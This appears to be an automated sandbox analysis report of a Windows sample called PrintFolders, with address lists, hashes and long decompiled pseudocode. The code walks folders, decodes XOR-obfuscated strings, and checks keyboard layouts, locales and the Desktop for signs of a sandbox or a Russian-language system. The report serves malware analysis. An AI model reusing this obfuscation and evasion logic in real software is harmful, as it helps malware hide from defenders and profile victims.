0x0040917e
0x00409180
0x00409185
0x00409185
0x00409188
0x0040918b
0x0040918d
0x00409193
0x00409193
0x00409196
0x00409199
0x004091a4
0x004091a7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040919b
0x0040919b
0x0040919e
0x004091a0
0x004091a0
0x004091a9
0x004091a9
0x004091ab
0x00000000
0x004091ad
0x004091ad
0x004091b0
0x004091d4
0x00000000
0x00000000
0x00000000
0x004091b0
0x004091ab
0x00000000
0x004091b2
0x004091b2
0x004091bd
0x004091c0
0x004091c1
0x004091c7
0x004091c9
0x004091c9
0x00000000
0x00000000
0x00000000
0x00409127
0x00409092
0x004091d6
0x004091d6
0x004091db
0x004091dc
0x004091dd
0x004091de
0x004091df
0x004091e0
0x004091e1
0x004091e6
0x004091ed
0x004091f6
0x004091fd
0x00409204
0x0040920b
0x0040920d
0x00409212
0x00409218
0x0040921e
0x00409225
0x0040922d
0x00409234
0x00409236
0x00409240
0x00409247
0x0040924c
0x0040925a
0x00409262
0x00409268
0x00409272
0x00409277
0x00409234
0x00409282
0x0040928c
0x00000000
0x00409129
0x00409129
0x0040912f
0x0040912f
0x00000000
0x00408fe3
0x00408fe8
0x00408fe8
0x00408ef7
0x00408ef7
0x00408efd
0x00408f1a
0x00408f24
0x00408eff
0x00408eff
0x00408f04
0x00408f14
0x00408f14
0x00408efd
0x00000000
0x00000000
0x00000000
0x00406c21
0x00406c11
0x00406c00
0x00000000

APIs

Part of subcall function 004065E0: GetCurrentProcess.KERNEL32(00000008,?), ref: 00406603
Part of subcall function 004065E0: OpenProcessToken.ADVAPI32(00000000), ref: 0040660A
Part of subcall function 004065E0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 00406623
Part of subcall function 004065E0: CloseHandle.KERNEL32(?), ref: 00406630

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,7BD02EAD,?,00000000), ref: 00406B37
__Init_thread_footer.LIBCMT ref: 00407ED3

Strings

)<, xrefs: 00408E12
.exe, xrefs: 004068BF, 00406D2E, 0040724C, 0040773C, 00407C1C, 004081AD, 004086BC, 00408BCC
\AI\, xrefs: 00408365
KC^., xrefs: 00408887
OCjO, xrefs: 0040836F

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ProcessToken$CloseCurrentFolderHandleInformationInit_thread_footerOpenPath
String ID: .exe$KC^.$OCjO$\AI\$)<
API String ID: 3622068345-3793718068
Opcode ID: 86dc44fb994b6dd9415c0bf608af7ba4a3155d101221ce84dd0fc1e0b537eb51
Instruction ID: f3a4c0b65de27d6511d17ec44510e10968ea22a81531b86e1dbf32cc3aae07d1
Opcode Fuzzy Hash: 86dc44fb994b6dd9415c0bf608af7ba4a3155d101221ce84dd0fc1e0b537eb51
Instruction Fuzzy Hash: 87C21570A002588BEB25DB24CE447DDBB71AF56308F1042EED4497B2D2DB799B88CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00404490 Relevance: 19.9, APIs: 7, Strings: 4, Instructions: 644
fileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00404490(void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _v8;
				int _v16;
				int _v24;
				int _v28;
				signed int _v32;
				int _v36;
				int _v40;
				signed int _v44;
				signed int _v48;
				int _v52;
				signed int _v56;
				char _v60;
				char _v64;
				long _v68;
				int _v72;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				long _v88;
				char _v89;
				char _v90;
				char _v92;
				char _v96;
				long _v100;
				int _v104;
				char _v105;
				signed int _v112;
				intOrPtr _v116;
				int _v120;
				long _v124;
				int _v128;
				int _v144;
				char _v308;
				char _v312;
				char _v316;
				struct _WIN32_FIND_DATAA _v412;
				char _v416;
				intOrPtr _v440;
				char _v456;
				signed int _v464;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				int _v560;
				char _v564;
				int _v568;
				char _v576;
				signed int _v584;
				intOrPtr _v1592;
				int _v1600;
				int _v1604;
				long _v1608;
				int _v1612;
				int _v1628;
				struct HKL__* _v2116;
				signed int _v2120;
				int _v2124;
				int _v2160;
				intOrPtr _v2180;
				char _v2188;
				signed int _v2192;
				intOrPtr _v2204;
				intOrPtr _v2208;
				signed int _v2212;
				intOrPtr _v2248;
				intOrPtr _v2252;
				signed int _v2304;
				char _v2554;
				short _v2556;
				int* _v2572;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t300;
				signed int _t301;
				void* _t309;
				int _t310;
				intOrPtr _t313;
				signed int _t320;
				signed int _t321;
				intOrPtr _t324;
				signed int _t325;
				intOrPtr* _t329;
				signed int _t330;
				intOrPtr _t335;
				signed char _t336;
				signed int _t337;
				signed int _t339;
				intOrPtr _t340;
				signed char _t341;
				signed int _t342;
				signed int _t344;
				intOrPtr _t345;
				signed int _t346;
				signed int _t348;
				int _t351;
				signed int _t357;
				signed int _t358;
				signed int _t361;
				int _t364;
				intOrPtr* _t366;
				int _t370;
				int _t372;
				signed int _t378;
				signed int _t379;
				intOrPtr _t381;
				intOrPtr _t390;
				signed int _t396;
				short _t398;
				signed int _t403;
				signed int _t409;
				signed char _t415;
				signed char* _t416;
				void* _t421;
				long _t422;
				intOrPtr _t423;
				int _t424;
				intOrPtr _t428;
				intOrPtr _t429;
				int _t430;
				int _t434;
				void* _t438;
				signed int _t439;
				void* _t445;
				signed int _t455;
				int _t462;
				signed int _t467;
				void* _t478;
				intOrPtr _t482;
				void* _t489;
				signed int _t490;
				void* _t491;
				void* _t495;
				char* _t499;
				int* _t503;
				int _t506;
				long _t508;
				void* _t514;
				void* _t516;
				void* _t518;
				int* _t520;
				signed int _t522;
				int _t523;
				void* _t524;
				signed int _t528;
				signed int _t531;
				intOrPtr* _t537;
				intOrPtr* _t540;
				signed char* _t544;
				intOrPtr* _t548;
				intOrPtr* _t552;
				int _t560;
				signed int _t566;
				int _t568;
				int _t571;
				signed int* _t572;
				signed int _t582;
				intOrPtr* _t583;
				signed int _t589;
				int _t593;
				signed int _t597;
				intOrPtr _t598;
				void* _t602;
				void* _t603;
				char _t604;
				long _t608;
				int _t611;
				void* _t613;
				long _t615;
				long _t616;
				int* _t617;
				int* _t618;
				int* _t619;
				long _t620;
				void* _t621;
				void* _t625;
				signed char* _t626;
				void* _t627;
				void* _t630;
				void* _t631;
				void* _t632;
				int _t633;
				void* _t634;
				int _t635;
				void* _t636;
				signed int _t637;
				void* _t638;
				signed int _t639;
				void* _t640;
				int* _t641;
				void* _t642;
				void* _t643;
				void* _t644;
				void* _t645;
				int _t646;
				signed char* _t647;
				void* _t648;
				void* _t649;
				void* _t650;
				int _t651;
				void* _t652;
				void* _t653;
				signed int _t654;
				void* _t656;
				void* _t657;
				int _t658;
				void* _t661;
				signed int _t664;
				signed int _t667;
				signed int _t670;
				signed int _t672;
				signed int _t674;
				void* _t676;
				signed int _t679;
				void* _t680;
				signed int _t686;
				void* _t687;
				int* _t688;
				int* _t689;
				int* _t690;
				int* _t691;
				int* _t692;
				int* _t693;
				signed int _t699;
				signed int _t700;
				void* _t703;
				signed int _t705;

				_push(__ebx);
				_t516 = _t676;
				_t679 = (_t676 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t516 + 4));
				_t664 = _t679;
				_push(0xffffffff);
				_push(0x42c4c8);
				_push( *[fs:0x0]);
				_push(_t516);
				_t680 = _t679 - 0x188;
				_t300 =  *0x43d054; // 0x7bd02ead
				_t301 = _t300 ^ _t664;
				_v32 = _t301;
				_push(_t643);
				_push(_t632);
				_push(_t301);
				 *[fs:0x0] =  &_v24;
				_v16 = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x20], xmm0");
				_v36 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v16 = 1;
				E0040BB90(_t516,  &_v92, __edx, _t632, __ecx);
				_v16 = 2;
				_t610 = _v72;
				_t528 = _v76;
				if(_v72 - _t528 < 2) {
					_v416 = 0;
					E00402980(_t516,  &_v92, _t632, _t643, 2, _v416, "\\*", 2);
				} else {
					_v76 = _t528 + 2;
					_t610 = 0x2a5c;
					_t514 =  >=  ? _v92 :  &_v92;
					 *((short*)(_t514 + _t528)) = 0x2a5c;
					 *((char*)(_t514 + _t528 + 2)) = 0;
				}
				_t308 =  >=  ? _v92 :  &_v92;
				_t309 = FindFirstFileA( >=  ? _v92 :  &_v92,  &_v412); // executed
				_t644 = _t309;
				if(_t644 == 0xffffffff) {
					L16:
					_t310 = _v40;
					_t633 = _v44;
					_v416 = _t310;
					if(_t633 == _t310) {
						L24:
						_t633 = 0;
						goto L25;
					} else {
						while(1) {
							E0040BB90(_t516,  &_v68, _t610, _t633, _t633);
							_t488 =  >=  ?  *((void*)(_t516 + 8)) : _t516 + 8;
							_t644 = _v68;
							_t612 = _v52;
							_t601 =  >=  ? _t644 :  &_v68;
							_t489 = E00402890( >=  ? _t644 :  &_v68, _v52,  >=  ? _t644 :  &_v68,  >=  ?  *((void*)(_t516 + 8)) : _t516 + 8,  *((intOrPtr*)(_t516 + 0x18)));
							_t680 = _t680 + 0xc;
							_t490 = _v48;
							if(_t489 != 0xffffffff) {
								break;
							}
							if(_t490 < 0x10) {
								L23:
								_t633 = _t633 + 0x18;
								if(_t633 != _v416) {
									continue;
								} else {
									goto L24;
								}
							} else {
								_t63 = _t490 + 1; // 0x11
								_t603 = _t63;
								_t495 = _t644;
								if(_t603 < 0x1000) {
									L22:
									_push(_t603);
									E0040EDFF(_t644);
									_t680 = _t680 + 8;
									goto L23;
								} else {
									_t644 =  *(_t644 - 4);
									_t536 = _t603 + 0x23;
									if(_t495 - _t644 + 0xfffffffc > 0x1f) {
										goto L45;
									} else {
										goto L22;
									}
								}
							}
							goto L158;
						}
						__eflags = _t490 - 0x10;
						if(__eflags < 0) {
							L41:
							_t633 = 1;
							L25:
							_t611 = _v72;
							if(_t611 < 0x10) {
								L29:
								_t531 = _v44;
								_v76 = 0;
								_v72 = 0xf;
								_v92 = 0;
								if(_t531 == 0) {
									L33:
									_t612 =  *(_t516 + 0x1c);
									if(_t612 < 0x10) {
										L43:
										 *[fs:0x0] = _v24;
										_pop(_t634);
										_pop(_t645);
										return E0040EBBF(_t633, _t516, _v32 ^ _t664, _t612, _t634, _t645);
									} else {
										_t536 =  *((intOrPtr*)(_t516 + 8));
										_t612 = _t612 + 1;
										_t313 = _t536;
										if(_t612 < 0x1000) {
											L42:
											_push(_t612);
											E0040EDFF(_t536);
											goto L43;
										} else {
											_t536 =  *((intOrPtr*)(_t536 - 4));
											_t612 = _t612 + 0x23;
											if(_t313 - _t536 + 0xfffffffc > 0x1f) {
												goto L44;
											} else {
												goto L42;
											}
										}
									}
								} else {
									_push(_t531);
									E0040D3F0(_t531, _v40, _t633, _t644);
									_t644 = _v44;
									_t680 = _t680 + 4;
									_t612 = 0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2;
									_t478 = _t644;
									_t597 = (0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2) + ((0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v36 - _t644) >> 0x20 >> 2)) * 2 << 3;
									if(_t597 < 0x1000) {
										L32:
										_push(_t597);
										E0040EDFF(_t644);
										_t680 = _t680 + 8;
										_v44 = 0;
										_v40 = 0;
										_v36 = 0;
										goto L33;
									} else {
										_t644 =  *(_t644 - 4);
										_t536 = _t597 + 0x23;
										if(_t478 - _t644 + 0xfffffffc > 0x1f) {
											goto L44;
										} else {
											goto L32;
										}
									}
								}
							} else {
								_t598 = _v92;
								_t630 = _t611 + 1;
								_t482 = _t598;
								if(_t630 < 0x1000) {
									L28:
									_push(_t630);
									E0040EDFF(_t598);
									_t680 = _t680 + 8;
									goto L29;
								} else {
									_t536 =  *((intOrPtr*)(_t598 - 4));
									_t612 = _t630 + 0x23;
									if(_t482 -  *((intOrPtr*)(_t598 - 4)) + 0xfffffffc > 0x1f) {
										goto L44;
									} else {
										goto L28;
									}
								}
							}
						} else {
							_t89 = _t490 + 1; // 0x11
							_t602 = _t89;
							_t491 = _t644;
							__eflags = _t602 - 0x1000;
							if(__eflags < 0) {
								L40:
								_push(_t602);
								E0040EDFF(_t644);
								_t680 = _t680 + 8;
								goto L41;
							} else {
								_t644 =  *(_t644 - 4);
								_t536 = _t602 + 0x23;
								__eflags = _t491 - _t644 + 0xfffffffc - 0x1f;
								if(__eflags > 0) {
									goto L45;
								} else {
									goto L40;
								}
							}
						}
					}
				} else {
					_t633 = FindNextFileA;
					goto L5;
					do {
						L6:
						_t604 =  *_t499;
						_t499 = _t499 + 1;
					} while (_t604 != 0);
					E004026B0(_t516,  &_v68,  &(_v412.cFileName), _t499 - _t631);
					_v16 = 3;
					_t503 = _v40;
					if(_t503 == _v36) {
						_push( &_v68);
						_push(_t503);
						E0040CE50(_t516,  &_v44, _t633, _t644);
						_t610 = _v48;
					} else {
						asm("movups xmm0, [ebp-0x38]");
						 *_t503 = 0;
						_t610 = 0xf;
						_v68 = 0;
						asm("movups [eax], xmm0");
						asm("movq xmm0, [ebp-0x28]");
						asm("movq [eax+0x10], xmm0");
						_v40 = _v40 + 0x18;
					}
					_v16 = 2;
					if(_t610 < 0x10) {
						L14:
						_t506 = FindNextFileA(_t644,  &_v412); // executed
						if(_t506 != 0) {
							L5:
							_t499 =  &(_v412.cFileName);
							_v68 = 0;
							_v52 = 0;
							_t631 = _t499 + 1;
							_v48 = 0xf;
							_v68 = 0;
							goto L6;
						} else {
							FindClose(_t644); // executed
							goto L16;
						}
					} else {
						_t608 = _v68;
						_t610 = _t610 + 1;
						_t508 = _t608;
						if(_t610 < 0x1000) {
							L13:
							_push(_t610);
							E0040EDFF(_t608);
							_t680 = _t680 + 8;
							goto L14;
						} else {
							_t536 =  *((intOrPtr*)(_t608 - 4));
							_t612 = _t610 + 0x23;
							if(_t508 -  *((intOrPtr*)(_t608 - 4)) + 0xfffffffc > 0x1f) {
								L44:
								E00413527(_t516, _t612, __eflags);
								L45:
								E00413527(_t516, _t612, __eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t516);
								_t518 = _t680;
								_t686 = (_t680 - 0x00000008 & 0xfffffff8) + 4;
								_push(_t664);
								_v440 =  *((intOrPtr*)(_t518 + 4));
								_t667 = _t686;
								_push(0xffffffff);
								_push(0x42c515);
								_push( *[fs:0x0]);
								_push(_t518);
								_t687 = _t686 - 0x50;
								_t320 =  *0x43d054; // 0x7bd02ead
								_t321 = _t320 ^ _t667;
								_v464 = _t321;
								_push(_t644);
								_push(_t633);
								_push(_t321);
								 *[fs:0x0] =  &_v456;
								_v480 = 0x7c6b7d7b;
								_v476 = 0x68617c7e;
								_v472 = 0x2e6b6267;
								_t635 =  *( *[fs:0x2c]);
								_t324 =  *0x450efc; // 0x8000000b
								__eflags = _t324 -  *((intOrPtr*)(_t635 + 4));
								if(_t324 >  *((intOrPtr*)(_t635 + 4))) {
									E0040EF48(_t324, 0x450efc);
									_t687 = _t687 + 4;
									__eflags =  *0x450efc - 0xffffffff;
									if(__eflags == 0) {
										asm("movq xmm0, [ebp-0x24]");
										asm("movq [0x450ea4], xmm0");
										 *0x450eac = _v52;
										E0040F25B(_t536, __eflags, 0x42cec0);
										E0040EEFE(0x450efc);
										_t687 = _t687 + 8;
									}
								}
								__eflags =  *0x450eaf;
								if( *0x450eaf != 0) {
									_t467 = 0;
									__eflags = 0;
									do {
										 *(_t467 + 0x450ea4) =  *(_t467 + 0x450ea4) ^ 0x0000002e;
										_t467 = _t467 + 1;
										__eflags = _t467 - 0xc;
									} while (_t467 < 0xc);
								}
								_t537 = 0x450ea4;
								_v120 = 0;
								_v104 = 0;
								_v100 = 0xf;
								_v120 = 0;
								_t108 = _t537 + 1; // 0x450ea5
								_t613 = _t108;
								do {
									_t325 =  *_t537;
									_t537 = _t537 + 1;
									__eflags = _t325;
								} while (_t325 != 0);
								E004026B0(_t518,  &_v120, 0x450ea4, _t537 - _t613);
								_v28 = 0;
								__eflags = _v100 - 0x10;
								_t328 =  >=  ? _v120 :  &_v120;
								_t329 = E00418B65(_t518, _t635, _t644, _v100 - 0x10,  >=  ? _v120 :  &_v120);
								_t614 = _t329;
								_v88 = 0;
								_t540 = _t329;
								_v72 = 0;
								_t688 = _t687 + 4;
								_v68 = 0xf;
								_v88 = 0;
								_t118 = _t540 + 1; // 0x1
								_t646 = _t118;
								do {
									_t330 =  *_t540;
									_t540 = _t540 + 1;
									__eflags = _t330;
								} while (_t330 != 0);
								E004026B0(_t518,  &_v88, _t614, _t540 - _t646);
								_v28 = 2;
								_t615 = _v100;
								__eflags = _t615 - 0x10;
								if(_t615 < 0x10) {
									L60:
									_t616 = _v68;
									_t543 = _v72;
									_v104 = 0;
									_v100 = 0xf;
									_v120 = 0;
									_push(8);
									_push("\\Desktop");
									__eflags = _t616 - _t543 - 8;
									if(_t616 - _t543 < 8) {
										_v96 = 0;
										_t543 =  &_v88;
										_push(_v96);
										_push(8);
										E00402980(_t518,  &_v88, _t635, _t646);
									} else {
										__eflags = _t616 - 0x10;
										_t130 = _t543 + 8; // 0x8
										_t660 =  >=  ? _v88 :  &_v88;
										_t661 = ( >=  ? _v88 :  &_v88) + _t543;
										_v72 = _t130;
										_push(_t661);
										E004104C0();
										_t688 =  &(_t688[3]);
										 *((char*)(_t661 + 8)) = 0;
									}
									_t335 =  *0x450f04; // 0x8000000c
									_v56 = 0x4b426d6d;
									_v52 = 0x5c4b404f;
									_v89 = 0x2e;
									__eflags = _t335 -  *((intOrPtr*)(_t635 + 4));
									if(_t335 >  *((intOrPtr*)(_t635 + 4))) {
										E0040EF48(_t335, 0x450f04);
										_t688 =  &(_t688[1]);
										__eflags =  *0x450f04 - 0xffffffff;
										if(__eflags == 0) {
											asm("movq xmm0, [ebp-0x20]");
											asm("movq [0x450f3c], xmm0");
											 *0x450f44 = _v89;
											E0040F25B(_t543, __eflags, 0x42cea0);
											E0040EEFE(0x450f04);
											_t688 =  &(_t688[2]);
										}
									}
									_t336 =  *0x450f44; // 0x0
									__eflags = _t336;
									if(_t336 != 0) {
										 *0x450f3c =  *0x450f3c ^ 0x0000002e;
										 *0x450f3d =  *0x450f3d ^ 0x0000002e;
										 *0x450f3e =  *0x450f3e ^ 0x0000002e;
										 *0x450f3f =  *0x450f3f ^ 0x0000002e;
										 *0x450f40 =  *0x450f40 ^ 0x0000002e;
										 *0x450f41 =  *0x450f41 ^ 0x0000002e;
										 *0x450f42 =  *0x450f42 ^ 0x0000002e;
										 *0x450f43 =  *0x450f43 ^ 0x0000002e;
										_t455 = _t336 ^ 0x0000002e;
										__eflags = _t455;
										 *0x450f44 = _t455;
									}
									_t689 = _t688 - 0x18;
									_t544 = 0x450f3c;
									_t617 = _t689;
									_t142 =  &(_t544[1]); // 0x450f3d
									_t647 = _t142;
									 *_t617 = 0;
									_t617[4] = 0;
									_t617[5] = 0xf;
									do {
										_t337 =  *_t544;
										_t544 =  &(_t544[1]);
										__eflags = _t337;
									} while (_t337 != 0);
									E004026B0(_t518, _t617, 0x450f3c, _t544 - _t647);
									_t339 = E00404490(_t518,  &_v88, _t617); // executed
									_t690 =  &(_t689[6]);
									_v89 = 0x2e;
									__eflags = _t339;
									_t340 =  *0x450fa0; // 0x8000000d
									_v90 = _t339 != 0;
									__eflags = _t340 -  *((intOrPtr*)(_t635 + 4));
									if(_t340 >  *((intOrPtr*)(_t635 + 4))) {
										E0040EF48(_t340, 0x450fa0);
										_t690 =  &(_t690[1]);
										__eflags =  *0x450fa0 - 0xffffffff;
										if(__eflags == 0) {
											asm("movaps xmm0, [0x439d80]");
											asm("movups [0x450ec0], xmm0");
											 *0x450ed0 = _v89;
											E0040F25B( &_v88, __eflags, 0x42ce80);
											E0040EEFE(0x450fa0);
											_t690 =  &(_t690[2]);
										}
									}
									_t341 =  *0x450ed0; // 0x0
									__eflags = _t341;
									if(_t341 != 0) {
										asm("movups xmm0, [0x450ec0]");
										asm("movaps xmm1, [0x439d30]");
										asm("pxor xmm1, xmm0");
										 *0x450ed0 = _t341 ^ 0x0000002e;
										asm("movups [0x450ec0], xmm1");
									}
									_t691 = _t690 - 0x18;
									_t548 = 0x450ec0;
									_t618 = _t691;
									_t150 = _t548 + 1; // 0x450ec1
									_t648 = _t150;
									 *_t618 = 0;
									_t618[4] = 0;
									_t618[5] = 0xf;
									do {
										_t342 =  *_t548;
										_t548 = _t548 + 1;
										__eflags = _t342;
									} while (_t342 != 0);
									E004026B0(_t518, _t618, 0x450ec0, _t548 - _t648);
									_t344 = E00404490(_t518,  &_v88, _t618); // executed
									_t692 =  &(_t691[6]);
									_v48 = 0x2e6d;
									__eflags = _t344;
									_t345 =  *0x450f08; // 0x8000000e
									_v89 = _t344 != 0;
									__eflags = _t345 -  *((intOrPtr*)(_t635 + 4));
									if(_t345 >  *((intOrPtr*)(_t635 + 4))) {
										E0040EF48(_t345, 0x450f08);
										_t692 =  &(_t692[1]);
										__eflags =  *0x450f08 - 0xffffffff;
										if(__eflags == 0) {
											asm("movaps xmm0, [0x439da0]");
											asm("movups [0x450f78], xmm0");
											 *0x450f88 = _v48;
											E0040F25B( &_v88, __eflags, 0x42ce60);
											E0040EEFE(0x450f08);
											_t692 =  &(_t692[2]);
										}
									}
									__eflags =  *0x450f89;
									if( *0x450f89 != 0) {
										asm("movups xmm0, [0x450f78]");
										_t445 = 0x10;
										asm("movaps xmm1, [0x439d30]");
										asm("pxor xmm1, xmm0");
										asm("movups [0x450f78], xmm1");
										do {
											 *(_t445 + 0x450f78) =  *(_t445 + 0x450f78) ^ 0x0000002e;
											_t445 = _t445 + 1;
											__eflags = _t445 - 0x12;
										} while (_t445 < 0x12);
									}
									_t693 = _t692 - 0x18;
									_t552 = 0x450f78;
									_t619 = _t693;
									_t160 = _t552 + 1; // 0x450f79
									_t649 = _t160;
									 *_t619 = 0;
									_t619[4] = 0;
									_t619[5] = 0xf;
									do {
										_t346 =  *_t552;
										_t552 = _t552 + 1;
										__eflags = _t346;
									} while (_t346 != 0);
									E004026B0(_t518, _t619, 0x450f78, _t552 - _t649);
									_t348 = E00404490(_t518,  &_v88, _t619); // executed
									_t688 =  &(_t693[6]);
									__eflags = _t348;
									if(_t348 == 0) {
										L89:
										_t646 = 0;
										__eflags = 0;
									} else {
										__eflags = _v90;
										if(_v90 == 0) {
											goto L89;
										} else {
											__eflags = _v89;
											if(_v89 == 0) {
												goto L89;
											} else {
												_t646 = 1;
											}
										}
									}
									_t620 = _v68;
									__eflags = _t620 - 0x10;
									if(_t620 < 0x10) {
										L94:
										 *[fs:0x0] = _v36;
										_pop(_t636);
										_pop(_t650);
										__eflags = _v44 ^ _t667;
										return E0040EBBF(_t646, _t518, _v44 ^ _t667, _t620, _t636, _t650);
									} else {
										_t560 = _v88;
										_t620 = _t620 + 1;
										_t351 = _t560;
										__eflags = _t620 - 0x1000;
										if(_t620 < 0x1000) {
											L93:
											_push(_t620);
											E0040EDFF(_t560);
											goto L94;
										} else {
											_t560 =  *(_t560 - 4);
											_t620 = _t620 + 0x23;
											__eflags = _t351 - _t560 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L96;
											} else {
												goto L93;
											}
										}
									}
								} else {
									_t593 = _v120;
									_t627 = _t615 + 1;
									_t462 = _t593;
									__eflags = _t627 - 0x1000;
									if(_t627 < 0x1000) {
										L59:
										_push(_t627);
										E0040EDFF(_t593);
										_t688 =  &(_t688[2]);
										goto L60;
									} else {
										_t560 =  *(_t593 - 4);
										_t620 = _t627 + 0x23;
										__eflags = _t462 - _t560 + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											E00413527(_t518, _t620, __eflags);
											L96:
											E00413527(_t518, _t620, __eflags);
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t518);
											_t520 = _t688;
											_t699 = (_t688 - 0x00000008 & 0xfffffff8) + 4;
											_push(_t667);
											_v560 = _t520[1];
											_t670 = _t699;
											_push(0xffffffff);
											_push(0x42c572);
											_push( *[fs:0x0]);
											_push(_t520);
											_t700 = _t699 - 0x630;
											_t357 =  *0x43d054; // 0x7bd02ead
											_t358 = _t357 ^ _t670;
											_v584 = _t358;
											_push(_t646);
											_push(_t635);
											_push(_t358);
											 *[fs:0x0] =  &_v576;
											_t651 = _t560;
											_v2120 = _t651;
											_v2160 = _t651;
											asm("xorps xmm0, xmm0");
											_v2124 = 0;
											asm("movq [esi], xmm0");
											 *(_t651 + 8) = 0;
											 *_t651 = 0;
											 *(_t651 + 4) = 0;
											 *(_t651 + 8) = 0;
											_v568 = 0;
											_v2124 = 1;
											_t361 = GetKeyboardLayoutList(0x400,  &_v2116);
											_t637 = 0;
											_v2120 = _t361;
											__eflags = _t361;
											if(_t361 <= 0) {
												L109:
												 *[fs:0x0] = _v48;
												_pop(_t638);
												_pop(_t652);
												__eflags = _v56 ^ _t670;
												return E0040EBBF(_t651, _t520, _v56 ^ _t670, _t620, _t638, _t652);
											} else {
												do {
													_t364 =  *(_t670 + _t637 * 4 - 0x610) & 0x0000ffff;
													_v1600 = _t364;
													GetLocaleInfoA(_t364, 2,  &_v564, 0x1f4); // executed
													_t366 =  &_v564;
													_v1628 = 0;
													_v1612 = 0;
													_t621 = _t366 + 1;
													_v1608 = 0xf;
													_v1628 = 0;
													do {
														_t566 =  *_t366;
														_t366 = _t366 + 1;
														__eflags = _t566;
													} while (_t566 != 0);
													E004026B0(_t520,  &_v1628,  &_v564, _t366 - _t621);
													_t568 = _v1600;
													_v1604 = _t568;
													_v40 = 1;
													_t370 =  *(_t651 + 4);
													__eflags = _t370 -  *(_t651 + 8);
													if(_t370 ==  *(_t651 + 8)) {
														_push( &_v1628);
														_push(_t370);
														E0040CC40(_t520, _t651, _t637, _t651);
														_t620 = _v1608;
													} else {
														asm("movups xmm0, [ebp-0x638]");
														_t620 = 0xf;
														_v1628 = 0;
														asm("movups [eax], xmm0");
														asm("movq xmm0, [ebp-0x628]");
														asm("movq [eax+0x10], xmm0");
														 *(_t370 + 0x18) = _t568;
														 *(_t651 + 4) =  *(_t651 + 4) + 0x1c;
													}
													_v40 = 0;
													__eflags = _t620 - 0x10;
													if(_t620 < 0x10) {
														goto L108;
													} else {
														_t571 = _v1628;
														_t620 = _t620 + 1;
														_t372 = _t571;
														__eflags = _t620 - 0x1000;
														if(_t620 < 0x1000) {
															L107:
															_push(_t620);
															E0040EDFF(_t571);
															_t700 = _t700 + 8;
															goto L108;
														} else {
															_t571 =  *(_t571 - 4);
															_t620 = _t620 + 0x23;
															__eflags = _t372 - _t571 + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																E00413527(_t520, _t620, __eflags);
																asm("int3");
																_push(_t670);
																_t672 = _t700;
																_push(0xffffffff);
																_push(0x42c5b5);
																_push( *[fs:0x0]);
																_t703 = _t700 - 0x5c;
																_t378 =  *0x43d054; // 0x7bd02ead
																_t379 = _t378 ^ _t672;
																_v2192 = _t379;
																_push(_t520);
																_push(_t651);
																_push(_t637);
																_push(_t379);
																 *[fs:0x0] =  &_v2188;
																_t522 = 0;
																_t572 =  &_v2212;
																asm("xorps xmm0, xmm0");
																_v2248 = 0;
																asm("movq [ebp-0x24], xmm0");
																_v2204 = 0;
																L97(); // executed
																_v2180 = 0;
																_t381 = _v2208;
																_t639 = _v2212;
																_v2252 = _t381;
																__eflags = _t639 - _t381;
																if(_t639 == _t381) {
																	L138:
																	_t523 = 0;
																	__eflags = 0;
																	goto L139;
																} else {
																	_v64 = 0x5d5d5b7c;
																	_v60 = 0x2e404f47;
																	_t658 =  *( *[fs:0x2c]);
																	_v120 = _t658;
																	do {
																		E0040BB90(_t522,  &_v104, _t620, _t639, _t639);
																		_v80 =  *((intOrPtr*)(_t639 + 0x18));
																		_v44 = 1;
																		_t414 =  *0x451008;
																		__eflags =  *0x451008 -  *((intOrPtr*)(_t658 + 4));
																		if( *0x451008 >  *((intOrPtr*)(_t658 + 4))) {
																			E0040EF48(_t414, 0x451008);
																			_t703 = _t703 + 4;
																			__eflags =  *0x451008 - 0xffffffff;
																			if(__eflags == 0) {
																				_t232 =  &_v64; // 0x5d5d5b7c
																				 *0x450d20 =  *_t232;
																				_t233 =  &_v60; // 0x2e404f47
																				 *0x450d24 =  *_t233;
																				E0040F25B( &_v104, __eflags, 0x42cee0);
																				E0040EEFE(0x451008);
																				_t703 = _t703 + 8;
																			}
																		}
																		_t415 =  *0x450d27; // 0x0
																		__eflags = _t415;
																		if(_t415 != 0) {
																			 *0x450d20 =  *0x450d20 ^ 0x0000002e;
																			 *0x450d21 =  *0x450d21 ^ 0x0000002e;
																			 *0x450d22 =  *0x450d22 ^ 0x0000002e;
																			 *0x450d23 =  *0x450d23 ^ 0x0000002e;
																			 *0x450d24 =  *0x450d24 ^ 0x0000002e;
																			 *0x450d25 =  *0x450d25 ^ 0x0000002e;
																			 *0x450d26 =  *0x450d26 ^ 0x0000002e;
